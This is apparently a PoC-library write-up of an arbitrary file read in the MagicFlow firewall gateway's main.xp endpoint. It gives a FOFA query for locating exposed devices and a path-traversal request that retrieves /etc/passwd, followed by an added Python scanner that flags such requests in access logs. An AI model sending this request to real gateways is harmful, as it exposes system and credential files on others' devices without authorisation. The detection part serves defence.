# MagicFlow Firewall Gateway main.xp Arbitrary File Read Vulnerability

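### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

The main.xp endpoint of the MagicFlow firewall gateway has an arbitrary file read vulnerability: an attacker can obtain sensitive files by constructing a specific URL.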

### Affected Products <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

MagicFlow firewall gateway

### FOFA <a href="#fofa" id="fofa"></a>

app="MSA/1.0"

### Vulnerability Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The login page looks like this:

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr4Jgu8Oh-sd4it_T5%2Fimage.png?alt=media\&token=342bea21-42b6-43a1-952a-f867df3f502b)

Construct the PoC:

```
/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-Mhr4Mh7Xvz4rlANuFop%2Fimage.png?alt=media\&token=5a6de938-981d-4541-9f36-f4937c09f310)
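To find this request pattern in web access logs, the following added example (not part of the original page) parses the `+`-separated main.xp query shown above and flags `downLoadFile` values that leave the download directory. The combined log format, the sample lines and all helper names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Function and parameter names come from the request shown on this page.
FUN_NAME = "msaDataCenetrDownLoadMore".lower()
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format assumed; IPs are documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd HTTP/1.1" 200 1024',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1024',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=msagroup.txt HTTP/1.1" 200 88',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 300',
]

def decode(value, rounds=3):
    """Percent-decode a few times so nested encodings normalise to the same text."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def parse_xp_query(query):
    """Split a main.xp query; fields are separated by '+' ('&' and whitespace accepted too)."""
    fields = {}
    for part in re.split(r"[+&\s]+", decode(query)):
        key, sep, val = part.partition("=")
        if sep:
            fields[key.lower()] = val
    return fields

def is_traversal(path):
    """True when the path has a '..' segment or is absolute."""
    p = path.replace("\\", "/")
    return p.startswith("/") or ".." in p.split("/")

def check_line(line):
    """Return the decoded downLoadFile value if the log line matches, else None."""
    m = REQ.search(line)
    path, _, query = (m.group(1) if m else "").partition("?")
    fields = parse_xp_query(query)
    if not decode(path).lower().endswith("/main.xp") or fields.get("fun", "").lower() != FUN_NAME:
        return None
    target = fields.get("downloadfile", "")
    return target if is_traversal(target) else None

def scan(lines):
    """Return (client address, requested file) for every flagged line."""
    return [(l.split()[0], t) for l in lines if (t := check_line(l))]
```

Calling `scan(SAMPLE_LOG)` returns the first two constructed entries; a hit that was answered with status 200 is worth checking against the response size to see whether file contents were returned.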
